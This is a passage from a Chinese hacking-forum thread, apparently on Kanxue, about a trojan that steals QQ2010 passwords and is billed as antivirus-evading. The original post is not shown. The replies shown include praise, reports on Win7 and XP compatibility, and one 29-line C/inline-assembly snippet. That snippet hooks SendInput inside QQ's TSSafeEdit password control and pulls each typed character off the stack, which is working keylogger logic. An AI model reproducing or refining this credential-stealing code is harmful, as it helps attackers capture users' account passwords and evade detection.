首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花
发表于: 2010-11-1 17:45 12501

[旧帖] [原创]刚写完的QQ2010木马源码,绝对免杀(以加上讲解) 0.00雪花

hmxiaowu 活跃值
2010-11-1 17:45
12501

查看主题内容

收藏
免费
支持
分享
最新回复 (146)
冰狐剑客
雪    币: 14
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
76
谢谢你的分享哦!
2010-11-2 18:47
0
小点
雪    币: 75
活跃值: (30)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
77
哇    是VC写的吧     不错啊  强大  呵呵
2010-11-2 18:47
0
azilljy
雪    币: 20
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
78
代码只对WIN7系统有效,XP暂不支持
2010-11-2 19:03
0
itoby
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
79
LZ 稍后 给我买个 邀请码
2010-11-2 22:18
0
hezhang
雪    币: 677
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
80
这东西开源 不和谐吧
2010-11-2 23:08
0
杨建风
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
81
虽然看不懂,但是支持楼主的原创和无私的精神
2010-11-3 01:13
0
踏雪流云
雪    币: 440
活跃值: (119)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
私信
82
如果快速方法没有找到,搜索整个盘会使硬盘狂转的,一下就被发现了。。。为啥不查找注册表呢?
2010-11-3 10:43
0
刘觐肇
雪    币: 119
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
83
还热乎着呢~~~~~
2010-11-3 10:56
0
刘觐肇
雪    币: 119
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
84
正是时候,还热乎着呢~~~~~
2010-11-3 10:56
0
cec
雪    币: 42
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
cec
85
楼主XP的有了吗?
2010-11-3 11:13
0
zhzhhach
雪    币: 298
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
86
盲目顶贴者路过。。。
2010-11-3 11:45
0
LEON赵刚
雪    币: 0
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
87
强人
2010-11-3 11:48
0
langxiaotx
雪    币: 7
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
88
这个比较有兴趣,看看!
2010-11-3 11:57
0
老许之
雪    币: 65
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
89
这个是用C写的。漠视win32汇编
2010-11-3 12:17
0
踏雪流云
雪    币: 440
活跃值: (119)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
私信
90
我测试的win7版,TSSafeEd返回地址不同:0012FA20  |01CB70D5  返回到 TSSafeEd.01CB70D5 来自 TSSafeEd.01CB7C9C;保存输入字符的栈地址不同:0012FAB0  |00000041;硬编码地址,不靠谱呀~~~
2010-11-3 12:52
0
majinxin
雪    币: 163
活跃值: (75)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
91
看到红头文字。。先不管三七二十一来回复一下。。开源是好事。。顶!!!!!!!
2010-11-3 13:13
0
hmxiaowu
雪    币: 39
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
92
他的高地址要变,低地址位始终没变过,我测试了几天的.结果,都是高地址变了,低地址始终是那个。
2010-11-3 13:54
0
踏雪流云
雪    币: 440
活跃值: (119)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
私信
93
搞了一个通用版的,测试了win7和xp sp3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
DWORD nRetAddress=0;
static DWORD dwTSSafeEdit=(DWORD)GetModuleHandle(TEXT("TSSafeEdit.dat"));
_asm
{
    push eax
    mov eax,0
    mov eax,[ebp+4]
    mov nRetAddress,eax
    pop eax
}
UINT nRet=0;
HookOff();
nRet=SendInput(nInputs,pInputs,cbSize);
HookOn();
 
if(nRetAddress-dwTSSafeEdit>0x16000||nRetAddress<dwTSSafeEdit)//返回地址不在TSSafeEdit中
{
    char key=0;
    _asm
    {
        push eax
        push ebx
        mov eax,0
        mov ebx,[ebp+0x44]//[ebp+0x44]存放的是字符指针
        mov al,[ebx]
        mov key,al
        pop ebx
        pop eax
    }
2010-11-3 14:08
0
wwlai
雪    币: 117
活跃值: (437)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
94
360报毒了
2010-11-3 14:46
0
azilljy
雪    币: 20
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
95
厉害!通用版地址代码确实好使!
2010-11-3 14:49
0
银san
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
96
不管怎样,开源的是要支持的,来学习一下!
2010-11-3 15:06
0
jhui
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
97
哇。。临时会员也可以发言了。嘻嘻。顶lz一个
2010-11-3 15:09
0
lapcca
雪    币: 362
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
98
我也来蹭个热闹!!!!!!
2010-11-3 16:02
0
licyong
雪    币: 197
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
99
虽然不懂~但是感觉lz很强~
2010-11-3 16:48
0
小P孩儿
雪    币: 23
活跃值: (15)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
100
360杀的是寂寞…
2010-11-3 16:52
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》